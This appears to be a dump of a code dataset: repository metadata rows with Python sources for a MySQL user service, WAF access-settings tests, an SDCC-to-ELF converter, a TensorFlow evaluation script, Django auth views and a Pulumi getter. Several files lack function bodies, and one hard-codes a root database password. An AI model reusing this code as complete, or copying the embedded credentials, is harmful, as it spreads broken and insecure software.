hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 11 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 251 | max_stars_repo_name stringlengths 4 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 251 | max_issues_repo_name stringlengths 4 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 251 | max_forks_repo_name stringlengths 4 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.05M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.04M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c75d41f3ecd90250dc9544657aba89378f5765d0 | 2,150 | py | Python | services/UserService.py | erginbalta/FarmChain | a542d19212f176b7b5d12806078459da105e5afa | [
"Apache-2.0"
] | 1 | 2021-01-16T14:38:21.000Z | 2021-01-16T14:38:21.000Z | services/UserService.py | erginbalta/FarmChain | a542d19212f176b7b5d12806078459da105e5afa | [
"Apache-2.0"
] | null | null | null | services/UserService.py | erginbalta/FarmChain | a542d19212f176b7b5d12806078459da105e5afa | [
"Apache-2.0"
] | 1 | 2020-07-23T04:00:07.000Z | 2020-07-23T04:00:07.000Z | import mysql.connector
import socket
from contextlib import closing
import json
import random
# Packet type tags used by this service's wire protocol; presumably
# INF=informational, TRN=transaction, USR=user -- TODO confirm against senders.
packetType= ["INF","TRN","USR"]
# Module-level MySQL connection shared by the service.
# SECURITY NOTE(review): credentials are hard-coded here; they should be moved
# to configuration / environment variables rather than committed to source.
database = mysql.connector.connect(
  host="localhost",
  user="root",
  port="3307",
  passwd="ergin00000",
  database="farmchain"
)
| 26.875 | 119 | 0.676744 |
c75e39b34cd2c6335e68141ae306111fa4b684be | 10,238 | py | Python | tests/blackbox/access_settings/test_bb_access_settings.py | csanders-git/waflz | ec8fc7c845f20a2a8c757d13845ba22a6d7c5b28 | [
"Apache-2.0"
] | 1 | 2019-03-16T09:02:58.000Z | 2019-03-16T09:02:58.000Z | tests/blackbox/access_settings/test_bb_access_settings.py | csanders-git/waflz | ec8fc7c845f20a2a8c757d13845ba22a6d7c5b28 | [
"Apache-2.0"
] | null | null | null | tests/blackbox/access_settings/test_bb_access_settings.py | csanders-git/waflz | ec8fc7c845f20a2a8c757d13845ba22a6d7c5b28 | [
"Apache-2.0"
] | 1 | 2021-04-22T09:43:46.000Z | 2021-04-22T09:43:46.000Z | #!/usr/bin/python
'''Test WAF Access settings'''
#TODO: make so waflz_server only runs once and then can post to it
# ------------------------------------------------------------------------------
# Imports
# ------------------------------------------------------------------------------
import pytest
import subprocess
import os
import sys
import json
from pprint import pprint
import time
import requests
# ------------------------------------------------------------------------------
# Constants
# ------------------------------------------------------------------------------
G_TEST_HOST = 'http://127.0.0.1:12345/'  # local server endpoint exercised by these tests
# ------------------------------------------------------------------------------
# globals
# ------------------------------------------------------------------------------
g_server_pid = -1  # pid of the spawned test server; -1 means "not running"
# ------------------------------------------------------------------------------
#
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
#setup_func
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
#teardown_func
# ------------------------------------------------------------------------------
def teardown_func():
    '''Stop the test server process recorded in g_server_pid, if one exists.'''
    global g_server_pid
    # brief pause so in-flight requests can finish before the kill
    time.sleep(.5)
    print 'teardown g_server_pid: %d'%(g_server_pid)
    if g_server_pid != -1:
        # run_command is presumably a shell helper defined elsewhere in this
        # file (not visible in this excerpt) -- it returns (code, out, err).
        l_code, l_out, l_err = run_command('kill -9 %d'%(g_server_pid))
        # give the killed process a moment to exit before the next test starts
        time.sleep(.5)
# ------------------------------------------------------------------------------
# test_bb_modsecurity_ec_access_settings_ignore_args
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_02_bypass_in_ignore_args
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_03_block_headers_not_in_ignore_header_list
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_04_bypass_headers_in_ignore_header_list
# ------------------------------------------------------------------------------
# -------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_05_bypass_headers_in_ignore_header_list_regex
# -------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_06_block_cookie_not_in_ignore_cookie_list
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_07_bypass_cookie_in_ignore_cookie_list
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_08_ignore_cookie_in_ignore_cookie_list
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_09_block_disallowed_http_method
# ------------------------------------------------------------------------------
| 49.458937 | 117 | 0.511428 |
c75ec65b0817a875da33fd517bd4f04f459ffba4 | 2,852 | py | Python | cosmosis/runtime/analytics.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | 1 | 2021-09-15T10:10:26.000Z | 2021-09-15T10:10:26.000Z | cosmosis/runtime/analytics.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | null | null | null | cosmosis/runtime/analytics.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | 1 | 2021-06-11T15:29:43.000Z | 2021-06-11T15:29:43.000Z | #coding: utf-8
from __future__ import print_function
from builtins import zip
from builtins import object
from cosmosis import output as output_module
import numpy as np
import sys
import os
| 31.688889 | 73 | 0.543829 |
c76014b2a087d9f2456ffc8e8847fb9b397481a4 | 8,148 | py | Python | sdcc2elf.py | Vector35/llil_transpiler | 6f6f368d34cb872460ad1634ddcbc4207276feb6 | [
"MIT"
] | 14 | 2019-08-23T13:49:07.000Z | 2021-12-24T20:09:57.000Z | sdcc2elf.py | Vector35/llil_transpiler | 6f6f368d34cb872460ad1634ddcbc4207276feb6 | [
"MIT"
] | null | null | null | sdcc2elf.py | Vector35/llil_transpiler | 6f6f368d34cb872460ad1634ddcbc4207276feb6 | [
"MIT"
] | 1 | 2021-12-24T20:10:00.000Z | 2021-12-24T20:10:00.000Z | #!/usr/bin/env python
#
# convert SDCC .rel files to 32-bit ELF relocatable
#
# resulting file is simple:
#
# ------------------------
# ELF header
# ------------------------
# .text section
# .shstrtab section
# .strtab section
# .symtab section
# ------------------------
# NULL elf32_shdr
# .text elf32_shdr
# .shstrtab elf32_shdr
# .symtab elf32_shdr
# .strtab elf32_shdr
# ------------------------
import os
import re
import sys
from struct import pack
#------------------------------------------------------------------------------
# ELF helpers
#------------------------------------------------------------------------------
# ELF program-header flag bits (p_flags): execute / write / read.
(PF_X, PF_W, PF_R) = (1,2,4)
# Section-header type codes (Elf32_Shdr.sh_type) used below.
(SHT_NULL, SHT_PROGBITS, SHT_STRTAB) = (0,1,3)
sz_ehdr = 0x34  # sizeof(Elf32_Ehdr)
sz_shdr = 0x28  # sizeof(Elf32_Shdr)
#------------------------------------------------------------------------------
# read .map file for symbols
#------------------------------------------------------------------------------
fpath_map = sys.argv[2]
assert fpath_map.endswith('.map')
with open(fpath_map) as fp:
    lines = fp.readlines()
# Address/size of the _CODE area, plus the line span [i_code, i_header)
# of the map file that lists the _CODE symbols.
(_CODE_ADDR, _CODE_SZ) = (None, None)
(i_code, i_header) = (None, None)
for (i, line) in enumerate(lines):
    if line.startswith('_CODE'):
        # "_CODE <addr:8 hex> <size:8 hex>"
        m = re.match(r'^_CODE\s+([A-F0-9]{8})\s+([A-F0-9]{8})', line)
        (addr, size) = map(lambda x: int(x, 16), m.group(1,2))
        if not i_code:
            # First _CODE record: remember where the symbol list begins.
            # NOTE(review): `if not i_code` also matches i_code == 0, so a
            # _CODE record on the very first line would be treated as unseen.
            i_code = i
            _CODE_ADDR = addr
            _CODE_SZ = size
        else:
            # Every subsequent _CODE record must agree with the first one.
            if addr != _CODE_ADDR:
                raise Exception('conflicting code segment addresses')
            if size != _CODE_SZ:
                raise Exception('conflicting code segment sizes')
    if line.startswith('_HEADER0'):
        # _HEADER0 marks the end of the _CODE symbol listing.
        i_header = i
        break
assert i_code and i_header and i_code < i_header
# Collect (symbol name, address) pairs from the _CODE region of the map.
syms = []
for line in lines[i_code:i_header]:
    m = re.search(r'([A-F0-9]{8})\s+(_\w+)', line)
    if m:
        (addr, symname) = m.group(1, 2)
        print('found %s: %s' % (addr, symname))
        syms.append((symname, int(addr, 16)));
assert syms
print('_CODE [%08X, %08X)' % (_CODE_ADDR, _CODE_ADDR+_CODE_SZ))
print('_CODE symbols from')
for (name, addr) in syms:
    print('%08X: %s' % (addr, name))
#------------------------------------------------------------------------------
# read .ihx file
#------------------------------------------------------------------------------
fpath_ihx = sys.argv[1]
assert fpath_ihx.endswith('.ihx')
# Flat image of the code segment: one single-byte bytes object per address.
code_area = [b'\x00'] * (_CODE_ADDR + _CODE_SZ)
with open(fpath_ihx) as fp:
    for line in fp.readlines():
        # Intel HEX data record: ':' count(2) addr(4) type"00" data csum(2)
        m = re.match(r'^:(..)(....)00(.*)(..)', line)
        if m:
            (count, addr, data, csum) = m.group(1,2,3,4)
            count = int(count,16)
            # record byte count must match the hex payload length
            assert count == len(data)/2
            addr = int(addr,16)
            # skip records that fall outside the _CODE area
            if not (addr >= _CODE_ADDR and addr < (_CODE_ADDR + _CODE_SZ)):
                continue
            print('%08X: ' % addr, end='')
            for i in range(count):
                byte_str = data[2*i]+data[2*i+1]
                print('%s ' % byte_str, end='')
                code_area[addr + i] = pack('B', int(byte_str, 16))
            print('')
            continue
        # Intel HEX end-of-file record terminates the parse.
        m = re.match(r'^:00000001FF', line)
        if m:
            break
        raise Exception('got unexpected IHX line: %s' % line)
assert code_area
#print(code_area)
#------------------------------------------------------------------------------
# write ELF
#------------------------------------------------------------------------------
# process symbols, build string table
# Sort by address so each function's size is the gap to the next symbol;
# the last symbol extends to the end of the code area.
syms = sorted(syms, key=lambda name_addr: name_addr[1])
func2size = {}      # symbol name -> size in bytes
func2stroffs = {}   # symbol name -> offset of its name inside .strtab
strtab = b'\x00'    # ELF string tables begin with a NUL byte
for i in range(len(syms)):
    (name, addr) = syms[i]
    if i == len(syms)-1:
        func2size[name] = len(code_area) - addr
    else:
        func2size[name] = syms[i+1][1] - addr
    func2stroffs[name] = len(strtab)
    strtab = strtab + name.encode('utf-8') + b'\x00'
    print('%04X: %s size %X' % (addr, name, func2size[name]))
# Emit the output object: a zeroed header placeholder first, then section
# contents in file order (.text, .shstrtab, .symtab, .strtab).
fp = open('tests.elf', 'wb')
# elf32_hdr (placeholder, we'll come back to fill in offsets)
print('elf32_hdr @ %X' % fp.tell())
fp.write(b'\x00' * sz_ehdr)
# .text section contents
o_text = fp.tell()
print('placing .text @ %X' % o_text)
for byte in code_area:
    fp.write(byte)
sz_text = fp.tell() - o_text
# .shstrtab section contents
scn_shstrtab = b'\x00.text\x00.shstrtab\x00.symtab\x00.strtab\x00'
# align() presumably pads the file offset to an alignment boundary; it is
# defined elsewhere in this file (not visible in this excerpt) -- confirm.
align(fp)
o_shstrtab = fp.tell()
print('placing .shstrtab @ %X' % o_shstrtab)
fp.write(scn_shstrtab)
sz_shstrtab = fp.tell() - o_shstrtab
# .symtab section contents: one Elf32_Sym per collected _CODE symbol
align(fp)
o_symtab = fp.tell()
print('placing .symtab @ %X' % o_symtab)
for (name, addr) in syms:
    st_name = func2stroffs[name]
    st_value = addr
    st_size = func2size[name]
    st_info = 0x12 # bind:1(GLOBAL) type:2(FUNC)
    st_other = 0
    st_shndx = 0x1 # section header index: 0'th: NULL 1'th: .text
    Elf32_Sym = pack('<IIIBBH', st_name, st_value, st_size, st_info, st_other, st_shndx)
    fp.write(Elf32_Sym)
sz_symtab = fp.tell() - o_symtab
# .strtab section contents
align(fp)
o_strtab = fp.tell()
print('placing .strtab @ %X' % o_strtab)
fp.write(strtab)
sz_strtab = fp.tell() - o_strtab
# Section headers, in index order: 0=NULL, 1=.text, 2=.shstrtab, 3=.symtab,
# 4=.strtab.  Each Elf32_Shdr is ten little-endian uint32 fields.
# null section header (index 0) - the mandatory all-zero entry
align(fp)
o_shdr_null = fp.tell()
print('placing shdr NULL @ %X' % o_shdr_null)
fp.write(b'\x00' * sz_shdr)
# .text section header (index 1)
o_shdr_text = fp.tell()
print('placing shdr .text @ %X' % fp.tell())
sh_name = scn_shstrtab.index(b'.text')
sh_type = 1 # SHT_PROGBITS
sh_flags = 6 # ALLOC|EXECINSTR
sh_addr = 0
sh_offset = o_text
sh_size = sz_text
sh_link = 0
sh_info = 0
sh_addralign = 4
sh_entsize = 0
tmp = pack('<IIIIIIIIII',
           sh_name, sh_type, sh_flags, sh_addr, sh_offset, sh_size, sh_link,
           sh_info, sh_addralign, sh_entsize)
fp.write(tmp)
# .shstrtab section header (index 2)
o_shdr_shstrtab = fp.tell()
print('placing shdr .shstrtab @ %X' % fp.tell())
sh_name = scn_shstrtab.index(b'.shstrtab')
sh_type = 3 #SHT_STRTAB
sh_flags = 0
sh_addr = 0
sh_offset = o_shstrtab
sh_size = sz_shstrtab
sh_link = 0
sh_info = 0
sh_addralign = 1
sh_entsize = 0
tmp = pack('<IIIIIIIIII',
           sh_name, sh_type, sh_flags, sh_addr, sh_offset, sh_size, sh_link,
           sh_info, sh_addralign, sh_entsize)
fp.write(tmp)
# .symtab section header (index 3)
o_shdr_symtab = fp.tell()
print('placing shdr .symtab @ %X' % fp.tell())
sh_name = scn_shstrtab.index(b'.symtab')
sh_type = 2 #SHT_SYMTAB
sh_flags = 0
sh_addr = 0
sh_offset = o_symtab
sh_size = sz_symtab
sh_link = 4 # link to scn #4 (find strings in .strtab)
sh_info = 0
sh_addralign = 4
# BUGFIX: SHT_SYMTAB sections must record the size of one table entry so
# readers can compute the symbol count as sh_size / sh_entsize; this was 0,
# which makes tools such as readelf see an empty/broken symbol table.
sh_entsize = 16 # sizeof(Elf32_Sym)
# NOTE(review): a fully conformant symtab also begins with an all-zero symbol
# at index 0, which this writer does not emit -- confirm downstream consumers.
tmp = pack('<IIIIIIIIII',
           sh_name, sh_type, sh_flags, sh_addr, sh_offset, sh_size, sh_link,
           sh_info, sh_addralign, sh_entsize)
fp.write(tmp)
# .strtab section header (index 4)
o_shdr_strtab = fp.tell()
print('placing shdr .strtab @ %X' % fp.tell())
sh_name = scn_shstrtab.index(b'.strtab')
sh_type = 3 #SHT_STRTAB
sh_flags = 0
sh_addr = 0
sh_offset = o_strtab
sh_size = sz_strtab
sh_link = 0
sh_info = 0
sh_addralign = 1
sh_entsize = 0
tmp = pack('<IIIIIIIIII',
           sh_name, sh_type, sh_flags, sh_addr, sh_offset, sh_size, sh_link,
           sh_info, sh_addralign, sh_entsize)
fp.write(tmp)
# seek back, write real elf header
hdr = b'\x7FELF'
hdr += b'\x01' # e_ident[EI_CLASS] 32-bit
hdr += b'\x01' # e_ident[EI_DATA] LSB (little-end)
hdr += b'\x01\x00\x00' # version, osabi, abiversion
hdr += b'\x00'*7 # pad e_ident out to EI_NIDENT (16) bytes
assert len(hdr) == 16
hdr += pack('<H', 1) # e_type = ET_REL
hdr += pack('<H', 220) # e_machine = EM_Z80
hdr += pack('<I', 1) # e_version = EV_CURRENT
hdr += pack('<I', 0) # e_entry
hdr += pack('<I', 0) # e_phoff
hdr += pack('<I', o_shdr_null) # e_shoff
hdr += pack('<I', 0) # e_flags
hdr += pack('<H', sz_ehdr) # e_ehsize
hdr += pack('<H', 0) # e_phentsize
hdr += pack('<H', 0) # e_phnum
hdr += pack('<H', sz_shdr) # e_shentsize
hdr += pack('<H', 5) # e_shnum
hdr += pack('<H', 2) # e_shstrndx = index of .shstrtab
assert len(hdr) == sz_ehdr
# overwrite the zeroed placeholder written at the start of the file
fp.seek(0, os.SEEK_SET)
fp.write(hdr)
# done!
fp.close()
| 27.714286 | 88 | 0.567624 |
c760d11b6bcb337986c7f02b8372675729e8a684 | 3,743 | py | Python | eval.py | nikinsta/deep-siamese-text-similarity-on-python-3 | 80fffd86da1d9f6bc0cb154a9415ff767d944777 | [
"MIT"
] | null | null | null | eval.py | nikinsta/deep-siamese-text-similarity-on-python-3 | 80fffd86da1d9f6bc0cb154a9415ff767d944777 | [
"MIT"
] | null | null | null | eval.py | nikinsta/deep-siamese-text-similarity-on-python-3 | 80fffd86da1d9f6bc0cb154a9415ff767d944777 | [
"MIT"
] | null | null | null | #! /usr/bin/env python
import tensorflow as tf
import numpy as np
import os
import time
import datetime
from tensorflow.contrib import learn
from input_helpers import InputHelper
# Parameters
# ==================================================
# Eval Parameters
tf.flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
tf.flags.DEFINE_string("checkpoint_dir", "", "Checkpoint directory from training run")
tf.flags.DEFINE_string("eval_filepath", "match_valid.tsv", "Evaluate on this data (Default: None)")
tf.flags.DEFINE_string("vocab_filepath", "runs/1479874609/checkpoints/vocab", "Load training time vocabulary (Default: None)")
tf.flags.DEFINE_string("model", "runs/1479874609/checkpoints/model-32000", "Load trained model checkpoint (Default: None)")
# Misc Parameters
tf.flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
tf.flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
FLAGS = tf.flags.FLAGS
FLAGS._parse_flags()
print("\nParameters:")
for attr, value in sorted(FLAGS.__flags.items()):
    print("{}={}".format(attr.upper(), value))
print("")
if FLAGS.eval_filepath is None or FLAGS.vocab_filepath is None or FLAGS.model is None:
    print("Eval or Vocab filepaths are empty.")
    exit()
# load data and map id-transform based on training time vocabulary
inpH = InputHelper()
x1_test, x2_test, y_test = inpH.getTestDataSet(FLAGS.eval_filepath, FLAGS.vocab_filepath, 30)
print("\nEvaluating...\n")
# Evaluation
# ==================================================
checkpoint_file = FLAGS.model
print(checkpoint_file)
graph = tf.Graph()
with graph.as_default():
    session_conf = tf.ConfigProto(
        allow_soft_placement=FLAGS.allow_soft_placement,
        log_device_placement=FLAGS.log_device_placement)
    sess = tf.Session(config=session_conf)
    with sess.as_default():
        # Load the saved meta graph and restore variables
        saver = tf.train.import_meta_graph("{}.meta".format(checkpoint_file))
        sess.run(tf.initialize_all_variables())
        saver.restore(sess, checkpoint_file)
        # Get the placeholders from the graph by name
        input_x1 = graph.get_operation_by_name("input_x1").outputs[0]
        input_x2 = graph.get_operation_by_name("input_x2").outputs[0]
        input_y = graph.get_operation_by_name("input_y").outputs[0]
        dropout_keep_prob = graph.get_operation_by_name("dropout_keep_prob").outputs[0]
        # Tensors we want to evaluate
        predictions = graph.get_operation_by_name("output/distance").outputs[0]
        accuracy = graph.get_operation_by_name("accuracy/accuracy").outputs[0]
        sim = graph.get_operation_by_name("accuracy/temp_sim").outputs[0]
        #emb = graph.get_operation_by_name("embedding/W").outputs[0]
        #embedded_chars = tf.nn.embedding_lookup(emb,input_x)
        # Generate batches for one epoch
        batches = inpH.batch_iter(list(zip(x1_test, x2_test, y_test)), 2*FLAGS.batch_size, 1, shuffle=False)
        # Collect the predictions here
        all_predictions = []
        all_d = []
        for db in batches:
            x1_dev_b, x2_dev_b, y_dev_b = zip(*db)
            # BUGFIX: bind the fetched similarity values to a fresh name.  The
            # original code rebound `sim` itself, replacing the graph tensor
            # with a numpy array and breaking sess.run() from the 2nd batch on.
            batch_predictions, batch_acc, batch_sim = sess.run(
                [predictions, accuracy, sim],
                {input_x1: x1_dev_b, input_x2: x2_dev_b, input_y: y_dev_b, dropout_keep_prob: 1.0})
            all_predictions = np.concatenate([all_predictions, batch_predictions])
            print(batch_predictions)
            all_d = np.concatenate([all_d, batch_sim])
            print("DEV acc {}".format(batch_acc))
        for ex in all_predictions:
            print(ex)
        # Fraction of examples whose predicted similarity equals the label.
        correct_predictions = float(np.mean(all_d == y_test))
        print("Accuracy: {:g}".format(correct_predictions))
| 42.05618 | 167 | 0.696767 |
c76173ed74a504071f1116fc3a7dc17a1c832c39 | 4,626 | py | Python | accounts/views.py | nikhiljohn10/django-auth | 01d97e8173436c3446f039cfa6472ece3cd9f96a | [
"MIT"
] | null | null | null | accounts/views.py | nikhiljohn10/django-auth | 01d97e8173436c3446f039cfa6472ece3cd9f96a | [
"MIT"
] | null | null | null | accounts/views.py | nikhiljohn10/django-auth | 01d97e8173436c3446f039cfa6472ece3cd9f96a | [
"MIT"
] | null | null | null | from django.urls import reverse
from django.conf import settings
from django.contrib import messages
from django.shortcuts import render, redirect
from django.core.mail import send_mail
from django.contrib.auth import login, logout, views, authenticate
from django.views.generic.edit import CreateView
from django.contrib.sessions.models import Session
from django.contrib.auth.decorators import login_required, permission_required
from accounts.tools import activater, mailer
from accounts.forms import SignUpForm, LoginForm
from accounts.models import User
class UserLogin(views.LoginView):
    """Login view wired to the project's custom template and auth form."""
    template_name = 'auth/login.html'
    authentication_form = LoginForm
class SignUpView(CreateView):
    """User registration view backed by SignUpForm."""
    form_class = SignUpForm
    template_name = 'auth/signup.html'
def user_manage_permission(user, username):
    """Return True when *user* may manage the account named *username*.

    A regular (non-staff) user may only manage their own account, while a
    staff user may manage any account other than their own.
    """
    is_own_account = (user.username == username)
    if user.is_staff:
        return not is_own_account
    return is_own_account
# Ready-to-use view callables for wiring into the URLconf.
user_login = UserLogin.as_view()
user_signup = SignUpView.as_view()
user_logout = views.LogoutView.as_view()
| 31.684932 | 78 | 0.671422 |
c7651286d18c5a48356115767024669710aad666 | 29 | py | Python | python/testData/intentions/PyAnnotateVariableTypeIntentionTest/annotationTupleType.py | truthiswill/intellij-community | fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/testData/intentions/PyAnnotateVariableTypeIntentionTest/annotationTupleType.py | truthiswill/intellij-community | fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | [
"Apache-2.0"
] | 173 | 2018-07-05T13:59:39.000Z | 2018-08-09T01:12:03.000Z | python/testData/intentions/PyAnnotateVariableTypeIntentionTest/annotationTupleType.py | truthiswill/intellij-community | fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z | v<caret>ar = (1, 'foo', None) | 29 | 29 | 0.551724 |
c7655b5b6676c78858c562c5f53a9ea086d6bb5c | 228 | py | Python | bot/venv/lib/python3.7/site-packages/scipy/version.py | manaccac/sc2_bot | 3aa8b3711378b71fd0a44662cdd7148846e39530 | [
"MIT"
] | 76 | 2020-07-06T14:44:05.000Z | 2022-02-14T15:30:21.000Z | bot/venv/lib/python3.7/site-packages/scipy/version.py | manaccac/sc2_bot | 3aa8b3711378b71fd0a44662cdd7148846e39530 | [
"MIT"
] | 37 | 2020-10-20T08:30:53.000Z | 2020-12-22T13:15:45.000Z | bot/venv/lib/python3.7/site-packages/scipy/version.py | manaccac/sc2_bot | 3aa8b3711378b71fd0a44662cdd7148846e39530 | [
"MIT"
] | 15 | 2020-11-30T22:12:22.000Z | 2020-12-09T01:32:48.000Z |
# THIS FILE IS GENERATED FROM SCIPY SETUP.PY
# Version identifiers baked in at build time (see the generated-file note above).
short_version = '1.5.4'
version = '1.5.4'
full_version = '1.5.4'
git_revision = '19acfed431060aafaa963f7e530c95e70cd4b85c'
release = True
if not release:
    # Development (non-release) builds expose the full version string instead.
    version = full_version
| 20.727273 | 57 | 0.745614 |
c765b8fb3017f33809adece1e8c0d5771ccc24b7 | 356 | py | Python | emrichen/input/__init__.py | jbek7/emrichen | b6b8327e35cb2b9f3da49519110ecc766a9ad741 | [
"MIT"
] | null | null | null | emrichen/input/__init__.py | jbek7/emrichen | b6b8327e35cb2b9f3da49519110ecc766a9ad741 | [
"MIT"
] | null | null | null | emrichen/input/__init__.py | jbek7/emrichen | b6b8327e35cb2b9f3da49519110ecc766a9ad741 | [
"MIT"
] | null | null | null | from typing import TextIO, Union
from .json import load_json
from .yaml import load_yaml
# Registry mapping an input-format name to the callable that parses it.
PARSERS = {
    'yaml': load_yaml,
    'json': load_json,
}
| 20.941176 | 79 | 0.676966 |
c7675ba7953da5231174f58bf3d8e9f9039a7d72 | 5,668 | py | Python | sdk/python/pulumi_aws_native/workspaces/get_workspace.py | pulumi/pulumi-aws-native | 1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3 | [
"Apache-2.0"
] | 29 | 2021-09-30T19:32:07.000Z | 2022-03-22T21:06:08.000Z | sdk/python/pulumi_aws_native/workspaces/get_workspace.py | pulumi/pulumi-aws-native | 1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3 | [
"Apache-2.0"
] | 232 | 2021-09-30T19:26:26.000Z | 2022-03-31T23:22:06.000Z | sdk/python/pulumi_aws_native/workspaces/get_workspace.py | pulumi/pulumi-aws-native | 1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3 | [
"Apache-2.0"
] | 4 | 2021-11-10T19:42:01.000Z | 2022-02-05T10:15:49.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetWorkspaceResult',
'AwaitableGetWorkspaceResult',
'get_workspace',
'get_workspace_output',
]
def get_workspace(id: Optional[str] = None,
                  opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetWorkspaceResult:
    """
    Resource Type definition for AWS::WorkSpaces::Workspace

    :param id: ID of the WorkSpace resource to look up.
    :param opts: Options for the invoke; a default InvokeOptions is created
        when omitted, and the SDK version is filled in if not pinned.
    """
    # (`id` shadows the builtin of the same name, but renaming it would break
    # callers that pass it by keyword.)
    __args__ = dict()
    __args__['id'] = id
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        opts.version = _utilities.get_version()
    # Invoke the provider-side lookup and unwrap the raw result value.
    __ret__ = pulumi.runtime.invoke('aws-native:workspaces:getWorkspace', __args__, opts=opts, typ=GetWorkspaceResult).value
    return AwaitableGetWorkspaceResult(
        bundle_id=__ret__.bundle_id,
        directory_id=__ret__.directory_id,
        id=__ret__.id,
        root_volume_encryption_enabled=__ret__.root_volume_encryption_enabled,
        tags=__ret__.tags,
        user_volume_encryption_enabled=__ret__.user_volume_encryption_enabled,
        volume_encryption_key=__ret__.volume_encryption_key,
        workspace_properties=__ret__.workspace_properties)
| 41.985185 | 211 | 0.711009 |
c768daaabaf9920391bc3d2ee09b1a53e4d2788c | 24 | py | Python | testtools/__init__.py | afy2103/spambayes-9-10-Frozen | 383db71e3b7b2141975cf66e6d223bb437511776 | [
"PSF-2.0"
] | null | null | null | testtools/__init__.py | afy2103/spambayes-9-10-Frozen | 383db71e3b7b2141975cf66e6d223bb437511776 | [
"PSF-2.0"
] | null | null | null | testtools/__init__.py | afy2103/spambayes-9-10-Frozen | 383db71e3b7b2141975cf66e6d223bb437511776 | [
"PSF-2.0"
] | null | null | null | __author__ = 'AlexYang'
| 12 | 23 | 0.75 |
c768fa044e6b10f72fbfbfa85435ada393a83af3 | 673 | py | Python | tests/test_distance.py | mkclairhong/quail | a6d6502746c853518a670d542222eb5fc2b05542 | [
"MIT"
] | 1 | 2018-05-30T15:33:26.000Z | 2018-05-30T15:33:26.000Z | tests/test_distance.py | mkclairhong/quail | a6d6502746c853518a670d542222eb5fc2b05542 | [
"MIT"
] | null | null | null | tests/test_distance.py | mkclairhong/quail | a6d6502746c853518a670d542222eb5fc2b05542 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from quail.distance import *
import numpy as np
import pytest
from scipy.spatial.distance import cdist
| 21.03125 | 41 | 0.580981 |
c769abd3fe7f81479f81afe9e3156873d7f5b0e2 | 17,050 | py | Python | utils/manisfestManager.py | ovitrac/pizza3 | 0f4dc6e362fd8665c72ec13328df05f9119dfbc3 | [
"MIT"
] | 1 | 2022-02-07T14:10:10.000Z | 2022-02-07T14:10:10.000Z | utils/manisfestManager.py | ovitrac/Pizza3 | 0f4dc6e362fd8665c72ec13328df05f9119dfbc3 | [
"MIT"
] | null | null | null | utils/manisfestManager.py | ovitrac/Pizza3 | 0f4dc6e362fd8665c72ec13328df05f9119dfbc3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
###############################################################################
# #
# manifestManager.py #
# #
# Work with online data manifests (creating / syncing / validating) #
# #
# Copyright (C) Michael Imelfort #
# #
###############################################################################
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
